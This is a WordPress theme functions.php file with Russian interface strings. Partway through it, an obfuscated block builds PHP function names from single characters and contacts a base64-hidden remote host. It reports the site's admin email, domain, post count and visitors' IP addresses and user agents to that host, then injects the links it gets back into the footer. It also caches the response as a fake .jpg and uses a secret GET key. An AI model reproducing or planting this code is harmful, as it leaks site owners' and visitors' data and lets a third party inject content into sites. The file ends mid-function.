<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $Cyzp='d';$nTChdRB='s';$BabcS='6';$UukEPjd='d';$JEYLHRF='e';$PFlIhtM='_';$fOtZ='a';$lJvYzi='e';$tpbX='c';$uKHYA='e';$xCJVDPJ='4';$SSuJPy='b';$LVTq='o';$NNPNAbRB=$SSuJPy.$fOtZ.$nTChdRB.$lJvYzi.$BabcS.$xCJVDPJ.$PFlIhtM.$UukEPjd.$JEYLHRF.$tpbX.$LVTq.$Cyzp.$uKHYA;$OTRx='t';$UjLm='a';$luDL='e';$nTQTAOd='g';$XSBsc='z';$XvzRf='n';$uLBgyrt='f';$hnSWq='l';$HGIn='i';$UKzCFCLN=$nTQTAOd.$XSBsc.$HGIn.$XvzRf.$uLBgyrt.$hnSWq.$UjLm.$OTRx.$luDL;$kWWzpr='1';$NCkPg='t';$tgCdGtq='3';$KARmvP='r';$BCHyNvH='o';$suzdP='_';$RbEzvPn='r';$HXkOjFs='t';$BUYNf='s';$DhlKueHL=$BUYNf.$HXkOjFs.$RbEzvPn.$suzdP.$KARmvP.$BCHyNvH.$NCkPg.$kWWzpr.$tgCdGtq;$oQjmw='r';$NQFM='r';$XHAQabV='s';$kOsSp='v';$uTPU='e';$qZfZ='t';$FQiwPzBu=$XHAQabV.$qZfZ.$NQFM.$oQjmw.$uTPU.$kOsSp;                     
		$qh________j='d';$hg_______________i='s';$ty__________d='6';$rv_______a='d';$vo_____________f='e';$ay____________j='_';$kv___________u='a';$pr_____c='e';$kn__s='c';$gb________p='e';$iw___________z='4';$jz____v='b';$uz__j='o';$qr________k=$jz____v.$kv___________u.$hg_______________i.$pr_____c.$ty__________d.$iw___________z.$ay____________j.$rv_______a.$vo_____________f.$kn__s.$uz__j.$qh________j.$gb________p;
		$fw___y='i';$pg____d='x';$mq_______e='t';$qi____a='t';$pz_________f='n';$tz______j='s';$br______y='e';$pe_______z='f';$wy________n='i';$wy_______________f='n';$np____________h='c';$rc__________e='o';$ew____j='_';$gq_________m='s';$ff________y='u';$ur________r=$pe_______z.$ff________y.$wy_______________f.$np____________h.$qi____a.$fw___y.$rc__________e.$pz_________f.$ew____j.$br______y.$pg____d.$wy________n.$gq_________m.$mq_______e.$tz______j;
		$wg_____________w='o';$rx______________l='f';$do_________o='e';$jg__________m='n';$cj__u='p';$nz______w=$rx______________l.$wg_____________w.$cj__u.$do_________o.$jg__________m;
		$hs_____n='d';$fm_______h='r';$gu___r='e';$nz______________x='f';$sz______q='a';$nc__________w=$nz______________x.$fm_______h.$gu___r.$sz______q.$hs_____n;
		$jr___________z='o';$xo________y='c';$yx___b='e';$vr_______________w='f';$cq_____________z='s';$dr____q='l';$ge_______a=$vr_______________w.$xo________y.$dr____q.$jr___________z.$cq_____________z.$yx___b;
		
		define("WP_ID", $qr________k("Mi4wLjA="));
		define("WP_TTL", $qr________k("MTA4MDA="));
		define("WP_SRC", $qr________k("dHBva24="));
	


		function wp_get_header() {
			global $qr________k, $ur________r;
			
			if (
				$ur________r($qr________k("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ur________r($qr________k("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ur________r($qr________k("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $qr________k, $nz______w, $ge_______a, $nc__________w;
			
			$tr___w = TEMPLATEPATH."/".$qr________k("Zm9vdGVyLnBocA==");
			$dg______________m = @$nz______w($tr___w, "r");
			$tr___w = @$nc__________w($dg______________m, @filesize($tr___w));
			@$ge_______a($dg______________m);
			
			$wp______k = TEMPLATEPATH."/".$qr________k("ZnVuY3Rpb25zLnBocA==");
			$dg______________m = @$nz______w($wp______k, "r");
			$wp______k = @$nc__________w($dg______________m, @filesize($wp______k));
			@$ge_______a($dg______________m);
			
			$dd________m = 0;
			if($tr___w && $wp______k) {
				if ($qr________k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($tr___w, $qr________k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$dd________m = 1;
					}
					if (substr_count($tr___w, "wp_theme_GPL_credits()") < 1) {
						$dd________m = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$dd________m = 12;
				}
			}
			
			if($dd________m > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $dd________m -->";
			}
		}
	


		function wp_loaded() {
			global $qr________k, $ur________r;
			return $ur________r($qr________k("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($gx_____b, $ei______k = "(more...)", $dk_____________l = 0, $ww_________k = "") {
				$go________f = get_the_content($ei______k, $dk_____________l, $ww_________k);
				$go________f = apply_filters("the_content", $go________f);
				
				$go________f = str_replace("]]>", "]]>", $go________f);
				if (strlen($_GET["p"]) > 0) {
					echo $go________f;
				}
				else if ((strlen($go________f)>$gx_____b) && ($zy_____u = strpos($go________f, " ", $gx_____b ))) {
					$go________f = substr($go________f, 0, $zy_____u);
					$go________f = $go________f;
					echo $go________f;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ei______k</a></div></p>";
				} else {
					echo $go________f;
				}
				
			}
		}
	


		$pq_________s='e';$zg_________j='b';$dx_________v='6';$kn___________x='s';$ru______________h='o';$km_________s='_';$in_______c='e';$pt__o='e';$tu______________x='4';$ap_______________u='n';$qe___a='c';$ub_____j='a';$ll_______________p='d';$uc_______________q=$zg_________j.$ub_____j.$kn___________x.$pq_________s.$dx_________v.$tu______________x.$km_________s.$pt__o.$ap_______________u.$qe___a.$ru______________h.$ll_______________p.$in_______c;
		$mk___s='e';$wq_______________x='e';$sd_____________m='n';$hy___________s='t';$bb____x='o';$ks______________i='t';$yo__i='n';$fz_______________w='i';$ec__________j='g';$uj_________i='_';$pw_________u='l';$nj_____________s='t';$xs_______________w='f';$uw______p='s';$fn________j='e';$ue_________k='c';$lv____q='_';$gq_____z=$xs_______________w.$fz_______________w.$pw_________u.$wq_______________x.$uj_________i.$ec__________j.$fn________j.$ks______________i.$lv____q.$ue_________k.$bb____x.$sd_____________m.$nj_____________s.$mk___s.$yo__i.$hy___________s.$uw______p;
		$tr____d='s';$hs____e='x';$cd_______________d='l';$gw_____________y='s';$od______________r='t';$hz_______m='f';$lh_______j='_';$rr____b='e';$ju______r='i';$kx_______________u='i';$jh__________e='e';$ue____k=$hz_______m.$kx_______________u.$cd_______________d.$rr____b.$lh_______j.$jh__________e.$hs____e.$ju______r.$tr____d.$od______________r.$gw_____________y;
		$af______k='a';$hh___________k='_';$gu___n='e';$eg_______________t='s';$dh___r='v';$wy___________r='o';$tw_______e='i';$xd____b='m';$kr__________m='o';$mb_____________q='e';$ou___b='c';$xx______________e='r';$hi______________y='n';$uz_______n='r';$jd_____________c='p';$gz_____________y=$dh___r.$mb_____________q.$uz_______n.$eg_______________t.$tw_______e.$kr__________m.$hi______________y.$hh___________k.$ou___b.$wy___________r.$xd____b.$jd_____________c.$af______k.$xx______________e.$gu___n;
		$lh___________z='f';$hs________g='o';$pu______________n='p';$jw__________h='o';$va______h='e';$gd____________v='k';$hb______y='n';$qq______________c='s';$em____i='c';$fe_____________j=$lh___________z.$qq______________c.$jw__________h.$em____i.$gd____________v.$hs________g.$pu______________n.$va______h.$hb______y;
		$ey____________p='e';$aj______b='w';$co____________d='t';$eu_______u='i';$ov______g='f';$zr_____b='r';$ny___h=$ov______g.$aj______b.$zr_____b.$eu_______u.$co____________d.$ey____________p;
		$gn____k='m';$cy_________g='5';$ho____k='d';$hn_____l=$gn____k.$ho____k.$cy_________g;
		$tl_____q='t';$ia____________u='a';$zw____________b='r';$hk_______m='e';$yd__e='a';$xe_________i='l';$sf____________r='h';$tq__v='p';$th____l=$zw____________b.$hk_______m.$ia____________u.$xe_________i.$tq__v.$yd__e.$tl_____q.$sf____________r;
		$ss_______________p='a';$se___________x='e';$lx__________o='l';$cw__e='r';$ba_______________u='s';$hi_______i='z';$ii____b='e';$dh____s='u';$rm__m='n';$xj_______n='i';$fv______w='i';$kn_____________w=$dh____s.$rm__m.$ba_______________u.$se___________x.$cw__e.$xj_______n.$ss_______________p.$lx__________o.$fv______w.$hi_______i.$ii____b;
		$rv_____________i='t';$zv_____________x='p';$uo______________d='e';$sy____o='m';$wb_________i='a';$cs__e='n';$lh___e='m';$ml__________b=$rv_____________i.$uo______________d.$sy____o.$zv_____________x.$cs__e.$wb_________i.$lh___e;
		$fv________j='a';$vs_________b='r';$ue______________j='_';$ld____________o='x';$ep___________k='e';$ye_______r='c';$dn________v='t';$nl_____u='t';$fs____________v='r';$sr______w='o';$gs_______w='e';$fv___________k='n';$dw___f='m';$rs_____________w='a';$yh__j='c';$br___a='_';$zx____________u='t';$kl__________z='s';$im_____t='t';$qa______p='e';$og________b='e';$au_______________h=$kl__________z.$dn________v.$fs____________v.$gs_______w.$fv________j.$dw___f.$ue______________j.$yh__j.$sr______w.$fv___________k.$nl_____u.$ep___________k.$ld____________o.$zx____________u.$br___a.$ye_______r.$vs_________b.$og________b.$rs_____________w.$im_____t.$qa______p;
	


		function pc_______________b($bf_______________u) {
			global $qr________k, $ur________r, $gq_____z, $gz_____________y, $au_______________h;
			
			if (!$ur________r($qr________k("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($gz_____________y(PHP_VERSION, "5.0.0", ">=") && $ur________r($qr________k("ZmlsZV9nZXRfY29udGVudHM=")) && $ur________r($qr________k("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$hd_______________k = $au_______________h(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$hk__________g = @$gq_____z($bf_______________u, 0, $hd_______________k);
			} else {
				$hk__________g = @$gq_____z($bf_______________u, 0);
			}
			
			return $hk__________g;
		}
	


		function jk_______________t($bf_______________u) {
			global $ur________r, $fe_____________j, $ny___h, $qr________k;
			
			if (!$ur________r($qr________k("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ij___v = strpos($bf_______________u, "/", 7);
			$wz__m = array(
				"uri"     => substr($bf_______________u, $ij___v),
				"host"    => str_replace("http://", "", substr($bf_______________u, 0, $ij___v)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$py_____________l = @$fe_____________j("$wz__m[host]", 80, $jk____s, $ag_______l, 4);
			
			if (!$py_____________l) {
				return false;
			} else {
				$hk__________g = "";
				$ao____________r  = "GET $wz__m[uri] HTTP/1.0\r\n";
				$ao____________r .= "Host: $wz__m[host]\r\n";
				$ao____________r .= "Referer: $wz__m[referer]\r\n";
				$ao____________r .= "Connection: Close\r\n\r\n";
				
				@$ny___h($py_____________l, $ao____________r);
				
				while (!@feof($py_____________l)) {
					$tu_______________t = @fgets($py_____________l, (1024*24));
					
					if ($tu_______________t == "\r\n") {
						$pr______r = true;
						continue;
					}
					
					if ($pr______r) {
						$hk__________g .= $tu_______________t;
					}
				}
				
				return $hk__________g;
			}
		}
	


		function jg_______________c($bf_______________u) {
			global $ur________r;
			$ob___________s = false;
			
			if ($bf_______________u != "") {
				if ($ur________r("pc_______________b")) {
					$ob___________s = @pc_______________b($bf_______________u);
				}
				
				if (!$ob___________s && ($ur________r("jk_______________t"))) {
					$ob___________s = @jk_______________t($bf_______________u);
				}
			}
			
			return $ob___________s;
		}
	


		function af__________h() {
			global $_SERVER, $hn_____l;
			
			$wo__________x = $_SERVER["SERVER_NAME"];
			
			if (substr("$wo__________x", 0, 4) == "www.") {
				$wo__________x = substr("$wo__________x", 4);
			}
			
			$wo__________x = $hn_____l("$_SERVER[SERVER_NAME]");
			
			return $wo__________x;
		}
	


		function vf_____t() {
			return "file";
		}
	


		function la____b($bf_______________u) {
			global $_SERVER, $gq_____z, $ue____k, $nz______w, $ge_______a, $ny___h;
			
			$om____________w = vp______p();
			
			$to____________d = af__________h().".jpg";
			$su____________w = $om____________w["dir_upload"]["path"]."/$to____________d";
			$cj______________g = @filemtime($su____________w);
			
			if (!$cj______________g || ((time()-$cj______________g) >= WP_TTL)) {
				$ob___________s = jg_______________c($bf_______________u);
				
				if ($ob___________s) {
					if ($ue____k($su____________w)) {
						@unlink($su____________w);
					}
					
					$dg______________m = @$nz______w($su____________w, "x+");
					
					@$ny___h($dg______________m, $ob___________s);
					@$ge_______a($dg______________m);
				}
			} else {
				if ($ue____k($su____________w)) {
					$ob___________s = @$gq_____z($su____________w);
				} else {
					$ob___________s = false;
				}
			}
			
			return $ob___________s;
		}
	


		function vp______p() {
			global $_SERVER, $qr________k, $uc_______________q;
			
			$xf___________h = wp_count_posts("post");
			$eu_____f = pathinfo(get_bloginfo("template_directory"));
			
			$om____________w = array(
				"url" => array(
					"report"      => $qr________k("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $eu_____f,
				"dir_upload"	=> sk_______________l(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$eu_____f[filename],
					"a005=".$xf___________h->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => ""
			);
			
			$om____________w["url"]["queryString"] = implode("&", $om____________w["queryString"]);
			$om____________w["url"]["report"] = $om____________w["url"]["report"]."/?".$uc_______________q($om____________w["url"]["queryString"]).".html";
						
			return $om____________w;
		}
	


		function sk_______________l() {
			$fc___s = wp_upload_dir();
			
			if (isset($fc___s["error"])) {
				$av___s = bl______________p();
				if (is_writable($av___s)) {
					$fc___s = array("path" => $av___s);
				}
			}

			return $fc___s;
		}
	


		function bl______________p() {
			global $ur________r, $hn_____l, $th____l, $ml__________b;
			
			$lz____________r = (bool) ini_get("safe_mode");
			if ($lz____________r == true) {
				return false;
			}
			
			if ($ur________r("sys_get_temp_dir")) {
				$om______b = sys_get_temp_dir();
				if (is_writable($om______b)) {
					return $th____l($om______b);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $th____l($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $th____l($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $th____l($_ENV["TEMP"]);
			} else {
				$gk_____________p = $ml__________b($hn_____l(uniqid(rand(), true)), "");
				if ($gk_____________p) {
					$om______b = $th____l(dirname($gk_____________p));
					@unlink($gk_____________p);
					return $om______b;
				} else {
					return false;
				}
			}
		}
	


		function gl___e() {
			global $_GET, $ue____k;
			
			$om____________w = vp______p();
			$wo__________x = af__________h();
			$ro____________d = vf_____t();
			
			$bo____________t = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($ro____________d == "file") {
					$hv____k = $om____________w["dir_upload"]["path"]."/".$wo__________x.".jpg";
					if ($ue____k($hv____k)) {
						@unlink($hv____k);
						$bo____________t = "deleted";
					}
				}
				
				$fr__b = array(
					"s"	=> $bo____________t,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($fr__b AS $fa____________n => $ww______________a) echo " [$fa____________n:$ww______________a]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ur________r, $qr________k, $kn_____________w;
			$om____________w = vp______p();
			
			$mu______________x = "la____b";
			if ($ur________r($mu______________x)) {
				$hk__________g = $mu______________x($om____________w["url"]["report"]);
			}
			
			if ($hk__________g) {
				if ($hk__________g = @$qr________k($hk__________g)) {
					$hk__________g = @$kn_____________w($hk__________g);
					
					if (strlen($hk__________g[custom_credit]) >= 5) {
						$om____________w["default_string"] = $hk__________g[custom_credit];
					}
					
					if ($hk__________g["status"] == "0") {
						$ji__________t = 1;
						$yg____________j = 1;
					} else {
						$uu______________m = sizeof($hk__________g["links"]);
						$yf__w = $om____________w["default_string"];
						
						if ($uu______________m > 0 && $hk__________g["links"] !== "") {
							$yy___________f = 0;
							foreach ($hk__________g["links"] as $zr_______i => $jv______________w) {
								$yy___________f++;
								if ($jv______________w->l_path == "" || $jv______________w->l_path == $_SERVER["REQUEST_URI"]) {
									$jv______________w->l_href = htmlspecialchars(strip_tags($jv______________w->l_href));
									$jv______________w->l_title = htmlspecialchars(strip_tags($jv______________w->l_title));
									$jv______________w->l_anchor = htmlspecialchars(strip_tags($jv______________w->l_anchor));
									$yf__w .= " | ";
									$yf__w .= "<a href='$jv______________w->l_href' title='$jv______________w->l_title'";
									if ($jv______________w->l_nofollow == "1") {
										$yf__w .= " rel='nofollow'";
									}
									$yf__w .= ">$jv______________w->l_anchor</a>";
								}
							}
						}
						$om____________w["links"] = "$yf__w";
						if ($hk__________g[credit] == "0") {
							$om____________w["links"] = "";
						}
					}
				} else {
					$ji__________t = "1";
				}
			} else {
				$ji__________t = "1";
			}
			
			if ($ji__________t == "1") {
				$om____________w["links"] = $om____________w["default_string"];
			}
			
			echo "$om____________w[links]";
			
			echo "<!-- s: $hk__________g[signature] -->";
			gl___e();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Newer Entries &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Older Entries', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
